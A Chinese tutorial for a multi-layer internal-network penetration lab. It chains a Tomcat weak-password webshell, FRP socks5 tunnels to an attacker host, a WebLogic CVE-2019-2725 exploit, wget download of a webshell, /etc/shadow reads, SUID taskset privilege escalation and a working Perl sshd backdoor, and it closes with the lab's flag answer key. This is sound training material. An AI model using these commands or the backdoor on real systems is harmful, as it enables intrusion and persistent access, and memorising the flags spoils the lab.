双层内网渗透虚拟仿真实战教学文档<\/h1>

实验环境概述<\/h2>

本实验提供了一个综合性的多层内网渗透测试虚拟仿真环境，通过以下攻击路径：<\/p>

外网WEB服务器渗透<\/li>
第一层内网渗透<\/li>
第二层内网渗透<\/li>

权限提升与持久化控制<\/li> <\/ol>

在线环境：https:\/\/www.yijinglab.com\/<\/p>

第一阶段：外网WEB服务器渗透<\/h2>

1. 信息收集<\/h3>

目标IP确认<\/strong>：10.1.1.121<\/p>

端口扫描<\/strong>：<\/p>

发现8080端口运行Tomcat服务，版本8.0.43<\/li> <\/ul>
目录扫描<\/strong>：<\/p>
dirb http:\/\/10.1.1.121:8080 <\/code><\/pre> 发现管理后台：<\/p> http:\/\/10.1.1.121:8080\/manager\/html<\/li> http:\/\/10.1.1.121:8080\/host-manager\/html<\/li> <\/ul> 2. Tomcat漏洞利用<\/h3> 弱口令登录<\/strong>：<\/p> 使用tomcat:tomcat成功登录管理后台<\/li> <\/ul> 木马部署<\/strong>：<\/p> 创建包含JSP木马的WAR包：<\/li> <\/ol> mkdir ant <\/span><\/span>cp ant.jsp ant\/ <\/span><\/span>cd ant <\/span><\/span>jar -cvf ant.war . <\/span><\/span><\/code><\/pre> 通过管理后台上传部署ant.war<\/li> <\/ol> WebShell访问<\/strong>：<\/p> URL: http:\/\/10.1.1.121:8080\/ant\/ant.jsp<\/li> 密码: ant<\/li> <\/ul> 3. 信息收集<\/h3> 系统信息收集<\/strong>：<\/p> # 查看网络配置<\/span> <\/span><\/span>ip a <\/span><\/span> <\/span><\/span># 查看用户信息<\/span> <\/span><\/span>cat \/etc\/passwd <\/span><\/span>cat \/etc\/shadow <\/span><\/span> <\/span><\/span># 查找敏感文件<\/span> <\/span><\/span>find \/ -name *pass* -type f <\/span><\/span>find \/ -name *admin* -type f <\/span><\/span> <\/span><\/span># 查找flag<\/span> <\/span><\/span>grep -r "flag*"<\/span> <\/span><\/span><\/code><\/pre>第二阶段：第一层内网渗透<\/h2> 4. 内网扫描<\/h3> 上传工具<\/strong>：<\/p> 上传ladon64到\/tmp目录<\/li> <\/ul> 内网扫描<\/strong>：<\/p> chmod +x ladon64 <\/span><\/span>.\/ladon64 172.22.0.0\/24 icmpscan <\/span><\/span><\/code><\/pre>发现存活主机：<\/p> 172.22.0.20<\/li> 172.22.0.22（开放7001端口，运行WebLogic 10.3.6.0）<\/li> <\/ul> 5. 建立Socks5代理<\/h3> FRP配置<\/strong>：<\/p> frpc.ini（Tomcat服务器）：<\/p> [common]<\/span> <\/span><\/span>server_addr<\/span> =<\/span> 10.1.1.119<\/span> <\/span><\/span>server_port<\/span> =<\/span> 7000<\/span> <\/span><\/span> <\/span><\/span>[socks5]<\/span> <\/span><\/span>type<\/span> =<\/span> tcp<\/span> <\/span><\/span>plugin<\/span> =<\/span> socks5<\/span> <\/span><\/span>remote_port<\/span> =<\/span> 5000<\/span> <\/span><\/span><\/code><\/pre>frps.ini（攻击机）：<\/p> [common]<\/span> <\/span><\/span>bind_addr<\/span> =<\/span> 10.1.1.119<\/span> <\/span><\/span>bind_port<\/span> =<\/span> 7000<\/span> <\/span><\/span><\/code><\/pre>启动服务<\/strong>：<\/p> 攻击机：.\/frps -c frps.ini<\/code><\/li> Tomcat服务器：.\/frpc -c frpc.ini<\/code><\/li> <\/ul> 代理测试<\/strong>：修改\/etc\/proxychains.conf：<\/p> socks5 127.0.0.1 5000 <\/code><\/pre> 6. Weblogic漏洞利用<\/h3> 漏洞扫描<\/strong>：<\/p> proxychains python3 weblogic-CVE-2019-2725.py 10.3.6 http:\/\/172.22.0.20:7001\/ whoami <\/span><\/span><\/code><\/pre>WebShell部署<\/strong>：<\/p> wget http:\/\/172.22.0.10:8080\/ant\/ant.txt -O servers\/AdminServer\/tmp\/_WL_internal\/bea_wls_internal\/9j4dqk\/war\/ant.jsp <\/span><\/span><\/code><\/pre> URL: http:\/\/172.22.0.20:7001\/bea_wls_internal\/ant.jsp<\/li> 密码: ant<\/li> <\/ul> 7. 信息收集<\/h3> 系统信息收集<\/strong>：<\/p> whoami <\/span><\/span>ip a <\/span><\/span>ps -elf <\/span><\/span>find \/ -name *pass* <\/span><\/span><\/code><\/pre>发现凭证<\/strong>：<\/p> \/root\/pass.txt中的base64编码：simadmin:dev@simadmin<\/code><\/li> <\/ul> 二层内网扫描<\/strong>：<\/p> .\/ladon64 172.26.0.0\/24 icmpscan <\/span><\/span><\/code><\/pre>发现存活主机：172.26.0.30<\/p> 第三阶段：二层内网渗透<\/h2> 8. 建立二层代理<\/h3> FRP配置<\/strong>：<\/p> Weblogic服务器（frpc.ini）：<\/p> [common]<\/span> <\/span><\/span>server_addr<\/span> =<\/span> 172.22.0.10<\/span> <\/span><\/span>server_port<\/span> =<\/span> 7000<\/span> <\/span><\/span> <\/span><\/span>[socks5_2]<\/span> <\/span><\/span>type<\/span> =<\/span> tcp<\/span> <\/span><\/span>plugin<\/span> =<\/span> socks5<\/span> <\/span><\/span>remote_port<\/span> =<\/span> 6666<\/span> <\/span><\/span><\/code><\/pre>Tomcat服务器（frps.ini）：<\/p> [common]<\/span> <\/span><\/span>bind_addr<\/span> =<\/span> 172.22.0.10<\/span> <\/span><\/span>bind_port<\/span> =<\/span> 7000<\/span> <\/span><\/span><\/code><\/pre>代理链配置<\/strong>：修改\/etc\/proxychains.conf：<\/p> socks5 172.22.0.10 6666 <\/code><\/pre> 9. 端口扫描<\/h3> proxychains nmap -Pn -sT -T4 172.26.0.30 <\/span><\/span><\/code><\/pre>发现开放22端口（SSH）<\/p> 10. SSH登录<\/h3> proxychains ssh simadmin@172.26.0.30 <\/span><\/span><\/code><\/pre>使用凭证：simadmin:dev@simadmin<\/p> 第四阶段：权限提升与持久化<\/h2> 11. 提权<\/h3> 查找SUID文件<\/strong>：<\/p> find \/ -perm -u=<\/span>s -type f <\/span><\/span><\/code><\/pre>利用taskset提权<\/strong>：<\/p> taskset 1<\/span> \/bin\/bash -p <\/span><\/span>whoami # 确认root权限<\/span> <\/span><\/span><\/code><\/pre>12. 权限持久化<\/h3> SSH后门部署<\/strong>：<\/p> cd \/usr\/sbin\/ <\/span><\/span>mv sshd ..\/bin <\/span><\/span>echo '#!\/usr\/bin\/perl'<\/span> >sshd <\/span><\/span>echo 'exec "\/bin\/sh" if (getpeername(STDIN) =~ \/^..LF\/);'<\/span> >>sshd <\/span><\/span>echo 'exec {"\/usr\/bin\/sshd"} "\/usr\/sbin\/sshd",@ARGV,'<\/span> >>sshd <\/span><\/span>chmod u+x sshd <\/span><\/span><\/code><\/pre>后门使用<\/strong>：<\/p> echo "whoami"<\/span> | socat STDIO TCP4:172.26.0.30:22,sourceport=<\/span>19526<\/span> <\/span><\/span><\/code><\/pre>关键知识点总结<\/h2> 信息收集<\/strong>：端口扫描、目录扫描、系统信息收集<\/li> 漏洞利用<\/strong>：Tomcat弱口令、WebLogic CVE-2019-2725<\/li> 代理技术<\/strong>：多层Socks5代理建立（FRP）<\/li> 横向移动<\/strong>：凭证重用、内网扫描<\/li> 权限提升<\/strong>：SUID提权（taskset）<\/li> 持久化<\/strong>：SSH Wrapper后门<\/li> <\/ol> 实验Flag汇总<\/h2> flag{df3b03ac2298b01bba7a3bac74fd7c9f}<\/li> flag{aa46468cee325f33f6e4a660d0b72011}<\/li> flag{e2a82c99b19d8368257198ecfaaa510f}<\/li> flag{ce395be7238ceb5bb8dd76fb7e220bec}<\/li> flag{b3d3422ba4cdb3de076f521f52d70e84}<\/li> flag{b7928c5332a5c8a9cdda4a7f18c87fca}<\/li> flag{fcc9f2e35685a3b074c53d0e619c1d26}<\/li> <\/ol> 注意事项<\/h2> 执行命令间隔需等待前一个连接关闭<\/li> 代理配置需正确设置<\/li> 文件上传需注意权限和路径<\/li> 后门连接源端口必须为19526<\/li> <\/ol>